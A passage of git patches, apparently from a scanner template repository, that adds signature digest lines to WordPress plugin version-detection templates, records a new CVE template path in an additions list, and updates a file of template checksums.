4b0a00483046022100ab41c6809a710e39759a6e02f13dc844d5f98fe5375bdf305147c66339fbb2b4022100d2a0f788eed4bac566e0a3426285412173e6a85428fe2d6188517b5851b19fa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..fdc825685d 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202f2b01ae098b85290607d70cefd4ae212f62f13b66362fdcd4fd992735567cc50220554102bcfe210990660bf55404a624591b4fe770d95e2a5f31a07a1c603622de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..7fc1211e34 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022066b6a627b7b9e30abf78763367d4206239b649bf757fde8eee5cbcd8127f042b02201798c1e71f5750f4d0c4bde01616926af14d39cf9129fbbdaf2ac77456124670:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..02fa3f5d17 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d362653cf02809174e3f45294baf9379b917c3ada2ef1dbfdbb9752f4102b59a022100971442760969beb0168388cdeebdbf0ce1b0f0dc9121b1e1b2ed241932649ff8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..1b6862d9b0 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220605db72b14761004ad106ac6aecc8765650616f12ebfe41fabcd2cc0cecf3a5b022100acd57e8a42d29a00bd6e1d22e0bca17b0dbdb6b6b9728e7d9cacdd7f927008a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..340f090f89 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220767b8bc3322ccfa62db604150b5324e3febd2aae4c15d001c72f22334002ec63022100b8f9154a27812578370ef241b47266ba1f881a4b146ccf97bc8657c2e8320107:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..4a777adda1 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b42392a4657abacba81c57b65a525970a1e1499742922081be5c4bd21fe3d484022100e5f3948f1aceeb3cbe79c340e4581cd1582b378d55c1f45b40ad8d69d0c6ef1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..b383b28c2d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205302ec255592f56391118be8c08a03bdcee5cf57bfc2046e2fd853a3771f188a02202359f4ac918134e36cce9f1d33ac4881e22720135f378bf60725e4cb22a1de01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..1f8203b9aa 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022051b2bd8eaeaf4d958d3dbe685e1e3c9d6d22a3be85b52671209e874c8219f05f022074e8de4fb0f905f5faa306352ff9bc970425a7f0ac08231e798277592e870a25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..528f9b792b 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205b968e3cdf4b0be69f03c181a9cda08db229fdd53d6ee48f0cda9124b66045eb022100b8594c29352e47b68354ec9e58c1ad01e10e8ff8fbbf0b3f66ece4db631c0f5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..3cc41d7dcb 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ac020c274d6c4ad6129954549c93cbab8204f7825e395d0f6ed5aa78c6df040a022100ffa8ff67eeaea802fdf67880fc8aead9c406a285108fe84c09cbc44e624517c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..80e39a6133 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205f1a6c6f782421fc7df14608b8b71f6bf6b0c7ed245d1b5fb6909fdc488b7bb60221008f5b9b4777514933d700c3c3da8ac90e1d0d6cde5173f7d6f69ca85231cc0ab1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..c229c14372 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220053ce011fe3003b2d8667a408fe2aef8d1b1dfcb7d6d3de2389cc2cbea422e68022100d64c8ca823cbbcaef83bbef9a39a81cf60d68060ff036a257018499e38922cf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..82171e13c9 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d618722483cd7d8d316cd853e10fd1ccf6df5963a0bc55859fda33084b91a3d3022100ca2691cfad924ecc1febbe93f3fd7db81efc559c4297816d7f99a92af59222b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..8445e1fa35 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b787dead769ad9fb459a645ee3d534a94f5e028468086b00be02bb75a27567b602207c054ba78009b7b036d99a702defb099c0ecf7f0105915336f21e568c49b04a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..4387693fcf 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220050b2857d82582275fa381f4f8e8161c72eed160fdbbedfa31b70fa278f933de022100a698dae0893080222f22d4c64ea90207b7572f91118aed1fcbac32837d06e869:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..1a3155040c 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203871679df6ab4546c38717a9054a1521b74ad24422eca6259fffa71dcdb73a7002200cd764dea774c7a8649375ee0e31486a783ac10a1b9fe95dcdc5974e43cdbe2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..7081bc90b2 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100edd65841adc632e9e8da73773bbca08bb9d74ec7e3c5b748566e143cc5e85d0b022053171eedf9460cd5bf325357574144b9336380a9151e1fbe2ee92cf4cb40ad8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..71a25cdd57 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220044e88e7d061ddb2a7e8c30eb0aba58b26f23cf2899cb9f1aeba14342360972502206f29b559fec4183aafacf68d7d332d3482931d7fc9bc083e96fe1473b6066c03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..64cb523d50 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220134ce8cb0aadc8a05f4ba39c5da7effa1754810de3683863164f041ca077c1160220795c76f73c3dff3a81ce7191948c85eea0ee4be9d37a65dc6577c5cac5576709:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..3d23bbbdef 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022063bd5f8beada56e56be41500d4db0ebd3d1e5d06e77b63fe684ff72e71d474be022023fcdae5cb0df3671eafdd54ef2deeae3f2407ddeee5814d0d0386dfbc5fce04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fa7451f2951b32c02c356a57abc20bbc571deac3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 30 Jul 2024 07:26:42 +0000 Subject: [PATCH 1745/1841] Auto Generated New Template Addition List [Tue Jul 30 07:26:42 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 2aaead52ec..3c7212c0fa 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ http/cves/2023/CVE-2023-44393.yaml http/cves/2024/CVE-2024-6205.yaml http/cves/2024/CVE-2024-6922.yaml +http/cves/2024/CVE-2024-7188.yaml http/misconfiguration/deployment-interface-exposed.yaml http/misconfiguration/installer/quickcms-installer.yaml http/osint/user-enumeration/substack.yaml From 305bc41bc554355f185e85a9e4e4d05d71b9485e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 30 Jul 2024 07:26:51 +0000 Subject: [PATCH 1746/1841] Auto Generated Templates Checksum [Tue Jul 30 07:26:51 UTC 2024] :robot: --- templates-checksum.txt | 406 +++++++++++++++++++++-------------------- 1 file changed, 204 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a10e448da1..d33f6b1e31 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3532,7 +3532,8 @@ http/cves/2024/CVE-2024-6289.yaml:83d044a4385a60a024a6dee9f02644f4db94a4b7 http/cves/2024/CVE-2024-6587.yaml:3b9b74b62b5fee24b9ae9e2138affc55ffabe1d3 http/cves/2024/CVE-2024-6646.yaml:2e73ea26a9329272c114fbee69cc648183fda206 http/cves/2024/CVE-2024-6746.yaml:d4ab2b4730c55e4aa424d56e07cd03f9b2c26859 -http/cves/2024/CVE-2024-6922.yaml:ad9284de1c396326ccdf10b44798a772202b97f7 +http/cves/2024/CVE-2024-6922.yaml:83b019597ae43258e9b9b0786304ed398ce3fe14 +http/cves/2024/CVE-2024-7188.yaml:10961e62f02c5ac7efc284a6b8fbef2ca7089a55 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -5780,6 +5781,7 @@ http/misconfiguration/installer/processwire-installer.yaml:77810f7d222228fb1c1af http/misconfiguration/installer/profittrailer-installer.yaml:7400afd0fc1552d5fc6e5dc1808e05294d9fe119 http/misconfiguration/installer/projectsend-installer.yaml:aa78d14c8384bd5355f0d504c5d73032eef9cc80 http/misconfiguration/installer/qloapps-installer.yaml:4cd9381f76856e1537af119a837b6e303bc97217 +http/misconfiguration/installer/quickcms-installer.yaml:a20b34b38abd6bf3e91475b93cf06d4599b6cac2 http/misconfiguration/installer/redash-installer.yaml:1087870f7e1826761d0ecbfbbc60528e43e028e0 http/misconfiguration/installer/ruckus-smartzone-install.yaml:48c25f2717f5e5a62abc32cc50f61474534259c7 http/misconfiguration/installer/ruckus-unleashed-install.yaml:55ab5a07d38c07dc39480173dbcbbbcb4e297e5d @@ -7334,230 +7336,230 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:e20237d3bfd7a6174e79fd4dffa8c53321df7615 +http/technologies/wordpress/plugins/add-to-any.yaml:7f9321df072f8cedf8d3e8a7edb56555c26826ec +http/technologies/wordpress/plugins/admin-menu-editor.yaml:b2927c35bef5ca8b557a385b64d3bd9a2535f4f1 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9afc9564525618ae1132bd1ef4eb255984952fd5 +http/technologies/wordpress/plugins/akismet.yaml:52b4510535ae905f3c4e28ef77690820d5fbf064 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:deedc83a02743be6f79b13cf0945ced6d97fe7fd +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:20a52cdc8748d24232f853f6213aa871b00b7aff +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:81650697a4550b59951b5fd2907abd306884a2f5 +http/technologies/wordpress/plugins/amp.yaml:750534d23116d63c9bc3c63d4135de0d77714728 +http/technologies/wordpress/plugins/antispam-bee.yaml:9628ef28b9e6e005c8deb971f531e488348b0c72 +http/technologies/wordpress/plugins/astra-sites.yaml:6cbdc6d7ff5d9128df27dc88824e34860b59a738 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:2dfcbbcf51184f268e3d233dad538dc71e0632eb +http/technologies/wordpress/plugins/backwpup.yaml:f111161dbb10b6c48d139f500a100f84f8f5de45 +http/technologies/wordpress/plugins/better-search-replace.yaml:8d5e9e1ab3fe229e48b9199c3f29c6d097f5f9dd +http/technologies/wordpress/plugins/better-wp-security.yaml:3b2067eb3584f35673d03b9871925cad425c3924 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9ac7d0e47add85b5c6490795d1a1adfd6352e6dd +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:35b7683860f1afcf542f04881bcb426dcee9bdbf +http/technologies/wordpress/plugins/breeze.yaml:08aea601c63fbb16e61bda531258d44c5b370a5f +http/technologies/wordpress/plugins/broken-link-checker.yaml:a1034cc504d92d14c3b351635735aa6c79a689df +http/technologies/wordpress/plugins/chaty.yaml:d6dbe760204db337b9e37d4de671dafbec313666 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:a0d87b9f9327f7f552ff5b68f4e9288c07bb29c2 +http/technologies/wordpress/plugins/classic-editor.yaml:852c0e262b0fe48b353f31af1182874e10201b16 +http/technologies/wordpress/plugins/classic-widgets.yaml:78165320e78261a5f8eb79be59d95509ee10ce80 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:53ef134128afffd88fd41d52c27b61da3a042180 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:9154be9c94ad075935ba7d5f2cfe7d7c99805182 +http/technologies/wordpress/plugins/coblocks.yaml:ac8a238f04c4fe87d15f8edc135ec1b00b1d5d63 +http/technologies/wordpress/plugins/code-snippets.yaml:80f4c90d6a5c3f170f7dc8bddc927b1d73fb9c73 +http/technologies/wordpress/plugins/coming-soon.yaml:9ecb9124ff6ea31e692b75018d22473817f84639 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:8b5034cd56884e71b957ff249ca7447ada92fdb6 +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:d96222fc7723deb266c563657f8dcc0e4340d20e +http/technologies/wordpress/plugins/contact-form-7.yaml:95bf050af59853efad627554442b1df7bf401331 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:8390191faf3c89f43be661920ee91e75a32b0cb6 +http/technologies/wordpress/plugins/cookie-law-info.yaml:058cd08dec576b15dbac5cf53ac1e3f8cf91a779 +http/technologies/wordpress/plugins/cookie-notice.yaml:6badbbf4cf9e77e824c1399297dd937900907fcf +http/technologies/wordpress/plugins/copy-delete-posts.yaml:d4948da97036a3d09d5ecfbd48f8387c6111ca49 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:648d662380914dfb6b8c59f2b0c77ea4a57645d1 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:57808a83856bcadac499a394681ca4e373392017 +http/technologies/wordpress/plugins/custom-css-js.yaml:1bae0a39cb0e3b698f16e6482bb08611c5b1c001 +http/technologies/wordpress/plugins/custom-fonts.yaml:b55e17b99f7de0d26f9aabb3ab304a2925486bc3 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:0080b7172788e3689fc63f1e7eeec3742f7d6c4b +http/technologies/wordpress/plugins/disable-comments.yaml:3968e7274d217dba7c12df49a5d2d7d0b4557602 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:73d91061d9bee789bf7994de50dd86100c0c80d9 +http/technologies/wordpress/plugins/duplicate-page.yaml:709f9913c81ce4881cce92c898d1550698143f80 +http/technologies/wordpress/plugins/duplicate-post.yaml:e173cf59ea2a562350ef9f3f61f87a01713d9e93 +http/technologies/wordpress/plugins/duplicator.yaml:42ef75011be7eb0795cfca96f2c51aab3e8a037a +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:3ae7fd78e0c03c4a4cc5e8bd8bfbfe235875158a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 